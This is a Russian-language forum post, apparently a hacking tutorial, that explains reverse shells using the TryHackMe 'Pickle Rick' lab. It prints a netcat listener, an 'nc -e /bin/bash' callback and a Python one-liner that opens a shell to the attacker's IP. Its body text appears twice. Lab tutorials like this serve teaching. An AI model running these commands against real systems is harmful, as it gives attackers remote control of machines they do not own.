- Регистрация
- 18 Авг 2024
- Сообщения
- 90
- Реакции
- 26
- Баллы
- 28
Обратная оболочка (reverse shell) — это тип оболочки, при котором целевая машина подключается к машине атакующего, а не наоборот. Это позволяет обойти брандмауэры и другие сетевые ограничения, которые могут блокировать входящие соединения. Давайте разберем, как это работает.
На атакующей машине откройте терминал и запустите Netcat для прослушивания любого порта , у меня 4444:
Здесь:
- -l указывает неткет прослушивать входящие соединения,
- -v включает режим отладки,
- -n предотвращает разрешение имен хостов,
- -p указывает порт.
Если у вас есть доступ к терминалу на атакуемой машине :
Здесь <your_ip> - это IP-адрес вашей атакующей машины, а 4444 - порт, который вы указали в неткете на атакующей машине.
Если доступ к терминалу ограничен или вы не можете использовать команды напрямую, вы можете использовать Python для создания обратной оболочки. Покажу на примере TryHackMe - машина Pickle Rick.

Проверим на наличие Python
Если Python установлен, вы увидите путь к исполняемому файлу.

Перейдите на сайт revshells.com, выберите Python, введите ваш IP-адрес и порт, и скопируйте сгенерированную команду.
Затем админ панели введите сгенерированную команду.
Это создаст обратную оболочку, которая подключится к вашей атакующей машине на указанный порт.
На атакующей машине откройте терминал и запустите Netcat для прослушивания любого порта , у меня 4444:
Код:
nc -lvnp 4444
Здесь:
- -l указывает неткет прослушивать входящие соединения,
- -v включает режим отладки,
- -n предотвращает разрешение имен хостов,
- -p указывает порт.
Если у вас есть доступ к терминалу на атакуемой машине :
Код:
nc -e /bin/bash <your_ip> 4444
Здесь <your_ip> - это IP-адрес вашей атакующей машины, а 4444 - порт, который вы указали в неткете на атакующей машине.
Если доступ к терминалу ограничен или вы не можете использовать команды напрямую, вы можете использовать Python для создания обратной оболочки. Покажу на примере TryHackMe - машина Pickle Rick.

Проверим на наличие Python
Код:
which python3

Перейдите на сайт revshells.com, выберите Python, введите ваш IP-адрес и порт, и скопируйте сгенерированную команду.
Затем админ панели введите сгенерированную команду.
Python:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("IP",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
Последнее редактирование: